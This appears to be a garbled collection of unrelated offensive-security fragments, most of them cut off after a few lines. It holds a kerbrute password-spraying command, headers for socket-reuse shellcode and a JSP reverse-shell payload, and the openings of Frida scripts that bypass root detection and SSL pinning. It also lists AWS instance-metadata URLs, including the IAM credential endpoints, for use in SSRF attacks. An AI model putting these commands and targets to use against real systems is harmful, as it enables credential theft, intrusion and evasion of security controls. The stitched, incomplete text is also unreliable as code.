With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus build that includes the brute module:
; Linux x86-64 - Execve ("/bin/sh") Socket Reuse
; Length: 79 bytes
; Date: 21/03/2021
; Author: Puttimate "Jusmistic" Thammasaeng
; Tested on: x86_64 Debian GNU/Linux
; Socket Reuse x86-64
; 1. Finding sockfd using getpeername function.
; 2. Call dup2 sockfd with 0,1 and 2.
; 3. Execute /bin/sh.
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause]
*/
setTimeout(function() {
Java.perform(function() {
console.log('');
<%
/*
 * Copyright (C) 2018 Nicolas Mauger - JSP payload
 * Two way of reverse shell : in html and with TCP port.
 *
 * ----------------------------------------------------------------------------
 * "THE BEER-WARE LICENSE" (Revision 42):
 * <nicolas@mauger.cafe> wrote this file. As long as you retain this notice
 * you can do whatever you want with this stuff. If we meet some day, and you
 * think this stuff is worth it, you can buy me a beer in return. Nicolas.
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
global _time_load
global _cache_flush
global _run_attempt
extern _bools
extern _values
extern _pointers
section .text
// Instructions
// Ctrl + Shift + C
// Click on any element
// Select the Console tab
// Paste the script and press Enter
// Close the window and you can use the following keyboard shortcuts:
// Ctrl + z :: Full Screen
// Ctrl + x :: Hide Options
// Ctrl + c :: Show Options